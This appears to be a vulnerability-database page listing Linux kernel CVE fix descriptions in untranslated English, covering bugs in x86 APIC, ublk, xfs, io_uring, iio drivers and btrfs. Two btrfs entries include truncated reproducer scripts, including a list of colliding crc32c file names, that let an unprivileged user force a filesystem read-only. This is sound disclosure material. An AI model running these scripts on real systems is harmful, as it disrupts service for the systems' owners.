Vulnerabilidades

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> x86/apic: Disable x2apic on resume if the kernel expects so<br /> <br /> When resuming from s2ram, firmware may re-enable x2apic mode, which may have<br /> been disabled by the kernel during boot either because it doesn&amp;#39;t support IRQ<br /> remapping or for other reasons. This causes the kernel to continue using the<br /> xapic interface, while the hardware is in x2apic mode, which causes hangs.<br /> This happens on defconfig + bare metal + s2ram.<br /> <br /> Fix this in lapic_resume() by disabling x2apic if the kernel expects it to be<br /> disabled, i.e. when x2apic_mode = 0.<br /> <br /> The ACPI v6.6 spec, Section 16.3 [1] says firmware restores either the<br /> pre-sleep configuration or initial boot configuration for each CPU, including<br /> MSR state:<br /> <br /> When executing from the power-on reset vector as a result of waking from an<br /> S2 or S3 sleep state, the platform firmware performs only the hardware<br /> initialization required to restore the system to either the state the<br /> platform was in prior to the initial operating system boot, or to the<br /> pre-sleep configuration state. In multiprocessor systems, non-boot<br /> processors should be placed in the same state as prior to the initial<br /> operating system boot.<br /> <br /> (further ahead)<br /> <br /> If this is an S2 or S3 wake, then the platform runtime firmware restores<br /> minimum context of the system before jumping to the waking vector. This<br /> includes:<br /> <br /> CPU configuration. Platform runtime firmware restores the pre-sleep<br /> configuration or initial boot configuration of each CPU (MSR, MTRR,<br /> firmware update, SMBase, and so on). Interrupts must be disabled (for<br /> IA-32 processors, disabled by CLI instruction).<br /> <br /> (and other things)<br /> <br /> So at least as per the spec, re-enablement of x2apic by the firmware is<br /> allowed if "x2apic on" is a part of the initial boot configuration.<br /> <br /> [1] https://uefi.org/specs/ACPI/6.6/16_Waking_and_Sleeping.html#initialization<br /> <br /> [ bp: Massage. ]

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> ublk: fix NULL pointer dereference in ublk_ctrl_set_size()<br /> <br /> ublk_ctrl_set_size() unconditionally dereferences ub-&gt;ub_disk via<br /> set_capacity_and_notify() without checking if it is NULL.<br /> <br /> ub-&gt;ub_disk is NULL before UBLK_CMD_START_DEV completes (it is only<br /> assigned in ublk_ctrl_start_dev()) and after UBLK_CMD_STOP_DEV runs<br /> (ublk_detach_disk() sets it to NULL). Since the UBLK_CMD_UPDATE_SIZE<br /> handler performs no state validation, a user can trigger a NULL pointer<br /> dereference by sending UPDATE_SIZE to a device that has been added but<br /> not yet started, or one that has been stopped.<br /> <br /> Fix this by checking ub-&gt;ub_disk under ub-&gt;mutex before dereferencing<br /> it, and returning -ENODEV if the disk is not available.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> xfs: fix undersized l_iclog_roundoff values<br /> <br /> If the superblock doesn&amp;#39;t list a log stripe unit, we set the incore log<br /> roundoff value to 512. This leads to corrupt logs and unmountable<br /> filesystems in generic/617 on a disk with 4k physical sectors...<br /> <br /> XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c<br /> XFS (sda1): Torn write (CRC failure) detected at log block 0x318e. Truncating head block from 0x3197.<br /> XFS (sda1): failed to locate log tail<br /> XFS (sda1): log mount/recovery failed: error -74<br /> XFS (sda1): log mount failed<br /> XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c<br /> XFS (sda1): Ending clean mount<br /> <br /> ...on the current xfsprogs for-next which has a broken mkfs. xfs_info<br /> shows this...<br /> <br /> meta-data=/dev/sda1 isize=512 agcount=4, agsize=644992 blks<br /> = sectsz=4096 attr=2, projid32bit=1<br /> = crc=1 finobt=1, sparse=1, rmapbt=1<br /> = reflink=1 bigtime=1 inobtcount=1 nrext64=1<br /> = exchange=1 metadir=1<br /> data = bsize=4096 blocks=2579968, imaxpct=25<br /> = sunit=0 swidth=0 blks<br /> naming =version 2 bsize=4096 ascii-ci=0, ftype=1, parent=1<br /> log =internal log bsize=4096 blocks=16384, version=2<br /> = sectsz=4096 sunit=0 blks, lazy-count=1<br /> realtime =none extsz=4096 blocks=0, rtextents=0<br /> = rgcount=0 rgsize=268435456 extents<br /> = zoned=0 start=0 reserved=0<br /> <br /> ...observe that the log section has sectsz=4096 sunit=0, which means<br /> that the roundoff factor is 512, not 4096 as you&amp;#39;d expect. We should<br /> fix mkfs not to generate broken filesystems, but anyone can fuzz the<br /> ondisk superblock so we should be more cautious. I think the inadequate<br /> logic predates commit a6a65fef5ef8d0, but that&amp;#39;s clearly going to<br /> require a different backport.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> io_uring/kbuf: check if target buffer list is still legacy on recycle<br /> <br /> There&amp;#39;s a gap between when the buffer was grabbed and when it<br /> potentially gets recycled, where if the list is empty, someone could&amp;#39;ve<br /> upgraded it to a ring provided type. This can happen if the request<br /> is forced via io-wq. The legacy recycling is missing checking if the<br /> buffer_list still exists, and if it&amp;#39;s of the correct type. Add those<br /> checks.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> iio: light: bh1780: fix PM runtime leak on error path<br /> <br /> Move pm_runtime_put_autosuspend() before the error check to ensure<br /> the PM runtime reference count is always decremented after<br /> pm_runtime_get_sync(), regardless of whether the read operation<br /> succeeds or fails.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> iio: imu: adis: Fix NULL pointer dereference in adis_init<br /> <br /> The adis_init() function dereferences adis-&gt;ops to check if the<br /> individual function pointers (write, read, reset) are NULL, but does<br /> not first check if adis-&gt;ops itself is NULL.<br /> <br /> Drivers like adis16480, adis16490, adis16545 and others do not set<br /> custom ops and rely on adis_init() assigning the defaults. Since struct<br /> adis is zero-initialized by devm_iio_device_alloc(), adis-&gt;ops is NULL<br /> when adis_init() is called, causing a NULL pointer dereference:<br /> <br /> Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000<br /> pc : adis_init+0xc0/0x118<br /> Call trace:<br /> adis_init+0xc0/0x118<br /> adis16480_probe+0xe0/0x670<br /> <br /> Fix this by checking if adis-&gt;ops is NULL before dereferencing it,<br /> falling through to assign the default ops in that case.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> iio: gyro: mpu3050-core: fix pm_runtime error handling<br /> <br /> The return value of pm_runtime_get_sync() is not checked, allowing<br /> the driver to access hardware that may fail to resume. The device<br /> usage count is also unconditionally incremented. Use<br /> pm_runtime_resume_and_get() which propagates errors and avoids<br /> incrementing the usage count on failure.<br /> <br /> In preenable, add pm_runtime_put_autosuspend() on set_8khz_samplerate()<br /> failure since postdisable does not run when preenable fails.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: add missing RCU unlock in error path in try_release_subpage_extent_buffer()<br /> <br /> Call rcu_read_lock() before exiting the loop in<br /> try_release_subpage_extent_buffer() because there is a rcu_read_unlock()<br /> call past the loop.<br /> <br /> This has been detected by the Clang thread-safety analyzer.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> iio: proximity: hx9023s: Protect against division by zero in set_samp_freq<br /> <br /> Avoid division by zero when sampling frequency is unspecified.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> i3c: mipi-i3c-hci: Fix race in DMA ring dequeue<br /> <br /> The HCI DMA dequeue path (hci_dma_dequeue_xfer()) may be invoked for<br /> multiple transfers that timeout around the same time. However, the<br /> function is not serialized and can race with itself.<br /> <br /> When a timeout occurs, hci_dma_dequeue_xfer() stops the ring, processes<br /> incomplete transfers, and then restarts the ring. If another timeout<br /> triggers a parallel call into the same function, the two instances may<br /> interfere with each other - stopping or restarting the ring at unexpected<br /> times.<br /> <br /> Add a mutex so that hci_dma_dequeue_xfer() is serialized with respect to<br /> itself.

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: fix transaction abort when snapshotting received subvolumes<br /> <br /> Currently a user can trigger a transaction abort by snapshotting a<br /> previously received snapshot a bunch of times until we reach a<br /> BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we<br /> can store in a leaf). This is very likely not common in practice, but<br /> if it happens, it turns the filesystem into RO mode. The snapshot, send<br /> and set_received_subvol and subvol_setflags (used by receive) don&amp;#39;t<br /> require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user<br /> could use this to turn a filesystem into RO mode and disrupt a system.<br /> <br /> Reproducer script:<br /> <br /> $ cat test.sh<br /> #!/bin/bash<br /> <br /> DEV=/dev/sdi<br /> MNT=/mnt/sdi<br /> <br /> # Use smallest node size to make the test faster.<br /> mkfs.btrfs -f --nodesize 4K $DEV<br /> mount $DEV $MNT<br /> <br /> # Create a subvolume and set it to RO so that it can be used for send.<br /> btrfs subvolume create $MNT/sv<br /> touch $MNT/sv/foo<br /> btrfs property set $MNT/sv ro true<br /> <br /> # Send and receive the subvolume into snaps/sv.<br /> mkdir $MNT/snaps<br /> btrfs send $MNT/sv | btrfs receive $MNT/snaps<br /> <br /> # Now snapshot the received subvolume, which has a received_uuid, a<br /> # lot of times to trigger the leaf overflow.<br /> total=500<br /> for ((i = 1; i /dev/null<br /> done<br /> echo<br /> <br /> umount $MNT<br /> <br /> When running the test:<br /> <br /> $ ./test.sh<br /> (...)<br /> Create subvolume &amp;#39;/mnt/sdi/sv&amp;#39;<br /> At subvol /mnt/sdi/sv<br /> At subvol sv<br /> Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type<br /> Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system<br /> <br /> And in dmesg/syslog:<br /> <br /> $ dmesg<br /> (...)<br /> [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!<br /> [251067.629212] ------------[ cut here ]------------<br /> [251067.630033] BTRFS: Transaction aborted (error -75)<br /> [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235<br /> [251067.632851] Modules linked in: btrfs dm_zero (...)<br /> [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)<br /> [251067.646165] Tainted: [W]=WARN<br /> [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014<br /> [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]<br /> [251067.649984] Code: f0 48 0f (...)<br /> [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292<br /> [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3<br /> [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750<br /> [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820<br /> [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0<br /> [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5<br /> [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000<br /> [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033<br /> [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0<br /> [251067.661972] Call Trace:<br /> [251067.662292] <br /> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]<br /> [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]<br /> [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]<br /> [251067.665238] ? _raw_spin_unlock+0x15/0x30<br /> [251067.665837] ? record_root_<br /> ---truncated---

*** Pendiente de traducción *** In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: fix transaction abort on file creation due to name hash collision<br /> <br /> If we attempt to create several files with names that result in the same<br /> hash, we have to pack them in same dir item and that has a limit inherent<br /> to the leaf size. However if we reach that limit, we trigger a transaction<br /> abort and turns the filesystem into RO mode. This allows for a malicious<br /> user to disrupt a system, without the need to have administration<br /> privileges/capabilities.<br /> <br /> Reproducer:<br /> <br /> $ cat exploit-hash-collisions.sh<br /> #!/bin/bash<br /> <br /> DEV=/dev/sdi<br /> MNT=/mnt/sdi<br /> <br /> # Use smallest node size to make the test faster and require fewer file<br /> # names that result in hash collision.<br /> mkfs.btrfs -f --nodesize 4K $DEV<br /> mount $DEV $MNT<br /> <br /> # List of names that result in the same crc32c hash for btrfs.<br /> declare -a names=(<br /> &amp;#39;foobar&amp;#39;<br /> &amp;#39;%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC&amp;#39;<br /> &amp;#39;AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z&amp;#39;<br /> &amp;#39;CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4&amp;#39;<br /> &amp;#39;ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:&amp;#39;<br /> &amp;#39;HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO&amp;#39;<br /> &amp;#39;Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us&amp;#39;<br /> &amp;#39;KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY&amp;#39;<br /> &amp;#39;NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO&amp;#39;<br /> &amp;#39;Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU&amp;#39;<br /> &amp;#39;Ono7avN5GjC:_6dBJ_&amp;#39;<br /> &amp;#39;WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am&amp;#39;<br /> &amp;#39;WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k&amp;#39;<br /> &amp;#39;XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2&amp;#39;<br /> &amp;#39;d3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd&amp;#39;<br /> &amp;#39;ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm&amp;#39;<br /> &amp;#39;evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ&amp;#39;<br /> &amp;#39;gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky&amp;#39;<br /> &amp;#39;hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS&amp;#39;<br /> &amp;#39;isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz&amp;#39;<br /> &amp;#39;kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu&amp;#39;<br /> &amp;#39;lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN&amp;#39;<br /> &amp;#39;rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4=&amp;#39;<br /> &amp;#39;uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn&amp;#39;<br /> &amp;#39;UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C&amp;#39;<br /> &amp;#39;y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW&amp;#39;<br /> &amp;#39;8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc&amp;#39;<br /> &amp;#39;YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mC<br /> ---truncated---